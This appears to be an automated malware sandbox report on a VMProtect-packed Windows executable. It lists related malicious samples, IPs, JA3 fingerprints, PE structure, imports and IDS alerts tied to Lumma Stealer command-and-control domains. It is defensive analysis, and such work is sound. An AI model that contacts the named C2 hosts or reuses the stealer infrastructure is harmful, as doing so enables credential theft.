                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        CLOUDFLARENETUShttps://heyzine.com/flip-book/f976862c0c.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 172.67.73.205
                                                                                                                                                                                                                                        H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                        HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                        DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 104.18.95.41
                                                                                                                                                                                                                                        Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.64.80
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 162.159.140.147
                                                                                                                                                                                                                                        goldlummaa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.50.161

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1f86nrrc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        goldlummaa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        ScreenUpdateSync.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        random.exe.10.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        No created / dropped files found

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.865628370184908
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:ji2xlo1f.exe
                                                                                                                                                                                                                                        File size:6'289'408 bytes
                                                                                                                                                                                                                                        MD5:9f8ca917737b3233abb943edc065659c
                                                                                                                                                                                                                                        SHA1:ea6df1e154c02f0089c8f3c4b3acc69c01d30774
                                                                                                                                                                                                                                        SHA256:cd4061786081eb01aa278dfff5adca5a80d827e456719e40d06f3dc9353bed22
                                                                                                                                                                                                                                        SHA512:2ffbab3c1b8518a4a2f75a20dd475949ad326adbe34b7f20d47840ec925b60af886839f55fd8360297bf573e2590b268091822b6c6daf1d349476cdef68c3780
                                                                                                                                                                                                                                        SSDEEP:98304:aqg9irR/fRdwlaqteBNHi9efT/VwE6S2miOaRDbSXBwI+tycngWhV7nITfse33Jo:aqgO/fR6peBnDVwXuSDCiTxDV7ITfXS
                                                                                                                                                                                                                                        TLSH:7456238B1A9B40EAD8C414B09317BAF713F2ADE64C860C377AC574CE74B2EB56167907
                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....3%g.............................IP...........@...................................`...@..................................b?....

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:0d01070e0b8ec70f

                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Entrypoint:0x9049e0
                                                                                                                                                                                                                                        Entrypoint Section:.vmp
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x67253391 [Fri Nov 1 20:01:21 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:6db65226fe38c2add317799e31764bfe

                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        push 031B931Dh
                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                        sub dword ptr [esp+04h], 8E9C018Bh
                                                                                                                                                                                                                                        not byte ptr [esp+04h]
                                                                                                                                                                                                                                        mov word ptr [esp+04h], CEA6h
                                                                                                                                                                                                                                        call 00007FE32D4A8BFCh
                                                                                                                                                                                                                                        call 00007FE32D149720h
                                                                                                                                                                                                                                        loope 00007FE32D1D6BEAh
                                                                                                                                                                                                                                        sub ah, byte ptr [edx-00C1EAC3h]
                                                                                                                                                                                                                                        adc ah, cl
                                                                                                                                                                                                                                        lea edx, dword ptr [27D2FF3Eh]
                                                                                                                                                                                                                                        std
                                                                                                                                                                                                                                        jns 00007FE32D1D6BD2h
                                                                                                                                                                                                                                        sbb byte ptr [ebx], 0000004Fh
                                                                                                                                                                                                                                        jbe 00007FE32D1D6C8Dh
                                                                                                                                                                                                                                        mov al, FFFFFFF0h
                                                                                                                                                                                                                                        fucomi st(0), st(2)
                                                                                                                                                                                                                                        rol dword ptr [eax], 44h
                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                        mov ebp, edx
                                                                                                                                                                                                                                        rol dword ptr [eax], FFFFFF94h
                                                                                                                                                                                                                                        ror byte ptr [ebx-16h], FFFFFFC1h
                                                                                                                                                                                                                                        add byte ptr [edi+edi*2], bl
                                                                                                                                                                                                                                        jns 00007FE32D1D6BE6h
                                                                                                                                                                                                                                        xor edi, edi
                                                                                                                                                                                                                                        haddps xmm7, xmm7
                                                                                                                                                                                                                                        adc dword ptr [ecx-718BB24Dh], esp
                                                                                                                                                                                                                                        nop
                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                        mov eax, 3A8BC736h
                                                                                                                                                                                                                                        dec ebx
                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                        jbe 00007FE32D1D6C11h
                                                                                                                                                                                                                                        pop esp
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        jnl 00007FE32D1D6BEFh
                                                                                                                                                                                                                                        leave
                                                                                                                                                                                                                                        push B5E7FF78h
                                                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                                                        xor dword ptr [eax+78h], ebp

                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3f62d40xa0.vmp
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x8f90000x64fbb.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x8f80000x6a8.reloc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x3260000xe4.vmp
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        .text0x10000x3f65a0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .rdata0x410000x255d0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .data0x440000xf0700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .vmp0x540000x2d10ce0x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .vmp0x3260000x26c0x40068931710b06e7b45b49528f8f1aa8078False0.2177734375data1.5033045918844197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .vmp0x3270000x5d0e100x5d10009961061084943ecbb8483bb1615607bbunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .reloc0x8f80000x6a80x80025877f7c938b200def1cc9b28f151b61False0.42138671875data3.695613417085349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .rsrc0x8f90000x64fbb0x2d800fbce41ded10dc7f3bf2933bbad27666aFalse0.6787592290521978data6.583707610599787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        TIS0x9267080x3f88dataEnglishUnited States0.04838709677419355
                                                                                                                                                                                                                                        TIS0x92a6900xd62emptyEnglishUnited States0
                                                                                                                                                                                                                                        TIS0x92b3f40x3c44emptyEnglishUnited States0
                                                                                                                                                                                                                                        TIS0x92f0380x888emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_CURSOR0x92f8c00x134emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_CURSOR0x92f9f40x134emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_CURSOR0x92fb280x134emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_CURSOR0x92fc5c0x134emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_CURSOR0x92fd900x134emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_BITMAP0x92fec40x6568emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_BITMAP0x93642c0x1148emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_BITMAP0x9375740x2f6aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_BITMAP0x93a4e00x84aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_BITMAP0x93ad2c0x1645eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_BITMAP0x95118c0x1b2aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_BITMAP0x952cb80xbeaemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_ICON0x8fa8c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.7368667917448405
                                                                                                                                                                                                                                        RT_ICON0x8fb9680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.5006802318703419
                                                                                                                                                                                                                                        RT_ICON0x90c1900x11b63PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003721725226404
                                                                                                                                                                                                                                        RT_ICON0x91dcf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.605595667870036
                                                                                                                                                                                                                                        RT_ICON0x91e59c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.42057761732851984
                                                                                                                                                                                                                                        RT_ICON0x91ee440x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4864864864864865
                                                                                                                                                                                                                                        RT_ICON0x91ef6c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.661849710982659
                                                                                                                                                                                                                                        RT_ICON0x91f4d40x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.4849290780141844
                                                                                                                                                                                                                                        RT_ICON0x91f93c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.26344086021505375
                                                                                                                                                                                                                                        RT_ICON0x91fc240x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4966216216216216
                                                                                                                                                                                                                                        RT_ICON0x91fd4c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.47247292418772563
                                                                                                                                                                                                                                        RT_ICON0x9205f40x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.6365606936416185
                                                                                                                                                                                                                                        RT_ICON0x920b5c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.2945590994371482
                                                                                                                                                                                                                                        RT_ICON0x921c040x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.4592198581560284
                                                                                                                                                                                                                                        RT_ICON0x92206c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5168918918918919
                                                                                                                                                                                                                                        RT_ICON0x9221940x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.596820809248555
                                                                                                                                                                                                                                        RT_ICON0x9226fc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7039007092198581
                                                                                                                                                                                                                                        RT_ICON0x922b640x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.527027027027027
                                                                                                                                                                                                                                        RT_ICON0x922c8c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5844594594594594
                                                                                                                                                                                                                                        RT_ICON0x922db40x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4667630057803468
                                                                                                                                                                                                                                        RT_ICON0x92331c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.3911290322580645
                                                                                                                                                                                                                                        RT_ICON0x9236040x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5257220216606499
                                                                                                                                                                                                                                        RT_ICON0x923eac0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6205673758865248
                                                                                                                                                                                                                                        RT_ICON0x9243140x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.37171669793621015
                                                                                                                                                                                                                                        RT_MENU0x9538a40x480emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_MENU0x953d240x72emptyRussianRussia0
                                                                                                                                                                                                                                        RT_MENU0x953d980x7cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_MENU0x953e140x70eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_MENU0x9545240x73aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_MENU0x954c600x2a4emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_MENU0x954f040x58emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x954f5c0x10eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x95506c0x3aaemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9554180xa4emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9554bc0x1f2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9556b00x1b2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9558640x21aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955a800xd8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955b580x160emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955cb80x1eeemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955ea80x312emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9561bc0x374emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9565300x136emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9566680x33eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9569a80x144emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x956aec0x2a2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x956d900xc8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x956e580x26eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9570c80x3aeemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9574780x2baemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9577340x3feemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x957b340x316emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x957e4c0x100emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x957f4c0xf6emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9580440x2b8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9582fc0xa2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9583a00xa2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9584440x26aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9586b00x41cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958acc0x120emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958bec0x288emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958e740x12eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958fa40x11eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9590c40x17eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9592440x366emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9595ac0x124emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9596d00x1feemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9598d00x12eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959a000x8aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959a8c0x130emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959bbc0x2eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959bec0x1d2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959dc00x97eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95a7400x29cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95a9dc0x332emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95ad100x38cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b09c0x262emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b3000x2acemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b5ac0x25cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b8080x688emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95be900x36eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95c2000x190emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95c3900x25eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95c5f00x5e8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95cbd80x558emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95d1300x46aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95d59c0x26cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95d8080x348emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95db500x292emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95dde40x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95ddf80x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95de0c0x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95de200x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95de340x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9253bc0x30dataEnglishUnited States0.8541666666666666
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9253ec0x14dataEnglishUnited States1.25
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254000x14dataEnglishUnited States1.25
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254140x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254440x5adataEnglishUnited States0.7444444444444445
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254a00x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254d00x14dataEnglishUnited States1.25
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254e40x5adataEnglishUnited States0.7555555555555555
                                                                                                                                                                                                                                        RT_VERSION0x9255400x38cPGP symmetric key encrypted data - Plaintext or unencrypted dataEnglishUnited States0.33259911894273125
                                                                                                                                                                                                                                        RT_MANIFEST0x9258cc0xe3bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.38594564919022784
                                                                                                                                                                                                                                        None0x95de480xc5empty0
                                                                                                                                                                                                                                        None0x95df100xabempty0

                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        KERNEL32.dllCopyFileW, ExitProcess, GetCommandLineW, GetCurrentProcessId, GetCurrentThreadId, GetLogicalDrives, GetSystemDirectoryW, GlobalLock, GlobalUnlock
                                                                                                                                                                                                                                        USER32.dllCloseClipboard, FindWindowExW, GetClipboardData, GetDC, GetForegroundWindow, GetSystemMetrics, GetWindowLongW, GetWindowThreadProcessId, IsWindowEnabled, IsWindowVisible, OpenClipboard, ReleaseDC
                                                                                                                                                                                                                                        GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, DeleteDC, DeleteObject, GetCurrentObject, GetDIBits, GetObjectW, GetPixel, SelectObject, StretchBlt
                                                                                                                                                                                                                                        ole32.dllCoCreateInstance, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoUninitialize
                                                                                                                                                                                                                                        SHELL32.dllSHEmptyRecycleBinW, SHGetFileInfoW
                                                                                                                                                                                                                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear, VariantInit
                                                                                                                                                                                                                                        KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                                        RussianRussia

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                        2024-12-18T15:17:35.709139+01002057352ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (terracedjz .cyou)1192.168.2.6637691.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:36.052127+01002057269ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop)1192.168.2.6550561.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:36.192611+01002057267ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mutterissuen .shop)1192.168.2.6570831.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:36.424197+01002057265ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (standartedby .shop)1192.168.2.6578981.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:36.738535+01002057263ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nightybinybz .shop)1192.168.2.6577791.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:36.962636+01002057259ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (conceszustyb .shop)1192.168.2.6622641.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:37.383090+01002057261ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bakedstusteeb .shop)1192.168.2.6558071.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:37.613350+01002057257ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (respectabosiz .shop)1192.168.2.6613281.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:37.754474+01002057255ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (moutheventushz .shop)1192.168.2.6648181.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-18T15:17:39.784288+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64971523.55.153.106443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:41.246844+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64971523.55.153.106443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:43.119365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:45.454383+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649724104.21.66.86443TCP
